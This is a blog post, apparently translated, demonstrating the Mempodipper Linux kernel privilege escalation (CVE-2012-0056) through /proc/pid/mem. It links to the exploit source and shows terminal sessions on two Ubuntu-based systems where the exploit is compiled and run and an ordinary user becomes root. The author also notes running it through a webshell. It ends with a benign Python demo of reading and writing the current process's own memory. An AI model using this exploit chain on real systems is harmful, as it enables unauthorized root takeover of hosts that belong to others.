This vulnerability is impressive: every kernel from 2.6.39 upward has it. Original source: http://blog.zx2c4.com/749. The exploit code can be found here: http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html
It works by writing to /proc/pid/mem. The /proc file system is a virtual file system: it occupies no disk space, dynamically reflects the running state of the system, and serves as an interface to kernel data structures. /proc/pid/mem is a read-write interface to a process's memory. The exploit uses it very cleverly; the original post explains it well, so read that for the details. Here is a quick test.
I tested successfully on 2.6.39.4 and 3.0.0-12; the platforms were bt5r1 (Ubuntu 10.04) and Ubuntu 11.10 respectively.
Ubuntu 11.10:
left@left-T-6843c:~$ uname -a
Linux left-T-6843c 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
left@left-T-6843c:~$ id
uid=1000(left) gid=1000(left) groups=1000(left),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
left@left-T-6843c:~$ cd desktop
left@left-T-6843c:~/desktop$ gcc -o exploit exploit.c
left@left-T-6843c:~/desktop$ chmod +x exploit
left@left-T-6843c:~/desktop$ ./exploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3417/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049770.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x8049760.
[+] Executing gpasswd with shellcode.
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1000(left)
Test on bt5r1:
left@bt:~$ cd Desktop
left@bt:~/Desktop$ id
uid=1001(left) gid=1001(left) groups=1001(left)
left@bt:~/Desktop$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
left@bt:~/Desktop$ chmod +x exploit
left@bt:~/Desktop$ ./exploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1885/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049dc0.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x8049db0.
[+] Executing gpasswd with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=1001(left)
I also tested it from a webshell and it succeeded there too; very powerful.
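Added example, not from the original post or from the Mempodipper source: it exercises the /proc/self/mem interface described above on a Linux host, reading and then patching a buffer inside the current process, which is the benign case the kernel always permits. The helper names (read_self_mem, write_self_mem, demo) are my own; opening another process's mem file is gated by the same permission check as ptrace attach, and the log above shows why that check has to hold for the process that ends up using the fd, since the exploit passes an already-opened fd into the setuid gpasswd.

```python
import ctypes
import os


def read_self_mem(addr: int, length: int) -> bytes:
    """Read `length` bytes at virtual address `addr` through /proc/self/mem."""
    fd = os.open("/proc/self/mem", os.O_RDONLY)
    try:
        # pread takes the virtual address directly as the file offset.
        return os.pread(fd, length, addr)
    finally:
        os.close(fd)


def write_self_mem(addr: int, data: bytes) -> int:
    """Overwrite memory at `addr` through /proc/self/mem; returns bytes written.

    The kernel services this with FOLL_FORCE, so it can patch pages that are
    mapped read-only; that is what makes the permission check on the mem file
    security-critical rather than a convenience.
    """
    fd = os.open("/proc/self/mem", os.O_WRONLY)
    try:
        return os.pwrite(fd, data, addr)
    finally:
        os.close(fd)


def demo() -> dict:
    """Constructed sample: patch a ctypes buffer via the mem file and observe
    the change through the ordinary pointer."""
    buf = ctypes.create_string_buffer(b"hello, mem")   # constructed sample data
    addr = ctypes.addressof(buf)
    before = read_self_mem(addr, 5)
    written = write_self_mem(addr, b"HELLO")
    after = bytes(buf.raw[:5])
    return {"before": before, "written": written, "after": after}


if __name__ == "__main__":
    print(demo())
```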